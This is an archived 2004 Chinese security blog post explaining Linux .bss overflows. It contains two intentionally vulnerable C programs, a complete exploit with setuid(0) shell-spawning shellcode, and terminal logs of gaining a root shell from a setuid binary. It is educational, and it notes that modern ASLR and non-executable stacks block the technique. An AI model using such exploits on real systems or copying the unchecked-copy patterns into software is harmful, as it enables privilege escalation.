Bytes#ph4nt0m.org

来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/index.php?blogid=37891&m=20041023 存档链接: https://web.archive.org/web/20041125185645id_/http://www.blogbus.com:80/blogbus/blog/index.php?blogid=37891&m=20041023


Bytes#ph4nt0m.org Bytes#ph4nt0m.org 首页 Tips (4) Diary (7) Work (5) Stuff (3) Other (9) About (0) 2004 年 10 月 Sun Mon Tue Wen Thu Fri Sat 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 最后更新 关于Linux .bss溢出 心声 最难的事 Share一个垃圾 马赛曲 Many Many more ... Telnet fingerprint Scanner:PTS-TSN_OS[scanner].c 两个面 米兰米兰 ZT-保护好你的妻子。 保护好爱你的人 最新评论 傲少 : 汗。这个是山贼泡. Bytes : 撒泡尿写下到此一. 存档 2004/01/02/-2004/10/01 我的链接 Ph4nt0m Jsk 死丫头Ann宝宝 蓝蓝 blog Oyxin(肉堆) blog Eong(毛毛) blog 分页

关于Linux .bss溢出 - 2004-10-23 08:36

/*
** BSS overflow vulnerable program
**
** By Bytes<Bytes[at]ph4nt0m.org>
**
** Ph4nt0m Security Team --- http://www.ph4nt0m.org/
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int c, char *v[]){
    static char buf[16], n, *cmd;   // BSS
    if (c != 3) {
        fprintf(stderr, "usage:%s \n", v[0]);
        return;
    }
    cmd = "/usr/bin/id";   // 将被覆盖的静态指针
    printf("buf addr = %p,cmd addr = %p,diff = %d\n", buf, cmd, (unsigned long)&cmd

        - (unsigned long)buf);
    printf("CMD = %s addr = %p argv[1] = %p\n", cmd, cmd, v[1]);
    strncpy(buf, v[2], strlen(v[2]));
    printf("Now CMD = %s addr = %p\n", cmd, cmd);
    system(cmd);
}

[Bytes@BytesWorkStation2# heap]$ ./bss
usage:./bss
[Bytes@BytesWorkStation2# heap]$ ./bss 1 1
buf addr = 0x80497b8,cmd addr = 0x80485fb,diff = 20
CMD = /usr/bin/id addr = 0x80485fb argv[1] = 0xbffffb6b
Now CMD = /usr/bin/id addr = 0x80485fb
uid=624(Bytes) gid=624(Test) groups=624(Test)
[Bytes@BytesWorkStation2# heap]$ ./bss '/bin/bash;' `perl -e 'print "B"x20 ."\x28\xfb\xff\xbf"'`
buf addr = 0x80497b8,cmd addr = 0x80485fb,diff = 20
CMD = /usr/bin/id addr = 0x80485fb argv[1] = 0xbffffb2a
Now CMD = /bin/bash; addr = 0xbffffb2a
[Bytes@BytesWorkStation2# heap]$
[Bytes@BytesWorkStation2# heap]$ ps
  PID TTY          TIME CMD
25583 pts/0    00:00:00 bash
25997 pts/0    00:00:00 bss
25998 pts/0    00:00:00 bash
26070 pts/0    00:00:00 ps

填充20个字节的垃圾数据,刚好覆盖到指针n,最后用/bin/bash;(加';'是为了保证命令正确执行,不被溢出后垃圾数据干扰,当然你也可以用'#'等字符)的地址覆盖cmd指针,该地址可以在一定范围进行猜测,也可以准确计算获得,本例为了方便起见,在缺陷程序中直接输出了.下面是一个更实际一点的例子,相同的原理,我们填充足够多的数据(260字节垃圾数据+4字节地址量,该地址指向一段可执行机器码---shellcode)就可以覆盖函数指针得到一个shell.

Codz:
/* Example vulnerable .bss section overflow
   Challenge one
   SolarIce 2004
   www.covertsystems.org */
#include <string.h>
#include <stdlib.h>

#define LEN 256

void output(char *);

int main(int argc, char **argv)
{
    static char buffer[LEN];
    static void (*func)(char *);

    func = output;
    strcpy(buffer, argv[1]);
    func(buffer);
    return EXIT_SUCCESS;
}

void output(char

*string)
{
    fprintf(stdout, "%s", string);
}

攻击代码如下:

Codz:
/*
** Exploit for CRS .bss section overflow Challenge one
**
** Code By Bytes<Bytes[at]ph4nt0m.org>
** Put shellcode to Environment
**
** Ph4nt0m Security Team --- http://www.ph4nt0m.org/
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define bufsize 260

/* setuid(0) shellcode by Matias Sedalo 3x ^_^ */
char shellcode[] =
    "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"
    "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void){
    char buf[bufsize];
    char *proc[] = { "./bss2", buf, NULL };
    char *envir[] = { "Bytes=2Lu", shellcode, NULL };
    unsigned long ret_addr = 0xc0000000 - strlen(proc[0]) - strlen(shellcode) - sizeof(void *) - 0x02;

    memset(buf, 0x42, sizeof(buf));
    memcpy(buf + bufsize - 4, (char *)&ret_addr, 4);
    execve(proc[0], proc, envir);
    return 0;
}

[Bytes@BytesWorkStation2# heap]$ ls -al bss2
-rwsr-sr-x 1 root root 11865 Oct 23 08:25 bss2
[Bytes@BytesWorkStation2# heap]$ id
uid=624(Bytes) gid=624(Test) groups=624(Test)
[Bytes@BytesWorkStation2# heap]$ ./expbss2
sh-2.05b# id
uid=0(root) gid=624(Test) groups=624(Test)
sh-2.05b#

(注:expbss2 的返回地址是按固定栈顶 0xc0000000 直接推算的,shellcode 也放在环境变量里原地执行,这两点都依赖于当时系统没有 ASLR 和不可执行栈;在默认开启这些缓解的现代系统上,同样的写法无法直接复现.)

Bytes 发表于 08:36 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑 分页